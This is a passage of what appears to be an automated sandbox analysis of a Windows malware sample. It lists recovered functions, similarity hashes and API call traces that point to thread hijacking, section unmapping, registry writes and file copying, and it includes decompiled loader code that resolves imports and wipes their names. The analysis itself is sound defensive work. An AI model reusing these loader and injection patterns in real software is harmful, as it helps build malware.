    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3996, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105 Total matches: 51registryfilememory
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 001C1B85, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79 Total matches: 31memoryfilestring
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C27F6, Relevance: 12.1, APIs: 8, Instructions: 52 Total matches: 80registry
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCEC, Relevance: 10.7, APIs: 7, Instructions: 161 Total matches: 54memorythreadsleep
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9D54, Relevance: 10.6, APIs: 7, Instructions: 144 Total matches: 54memoryregistry
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9692, Relevance: 10.6, APIs: 7, Instructions: 138 Total matches: 53string
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9BEF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125 Total matches: 48memory
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDB50, Relevance: 10.6, APIs: 7, Instructions: 122 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB703, Relevance: 10.6, APIs: 7, Instructions: 112 Total matches: 56synchronizationthread
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
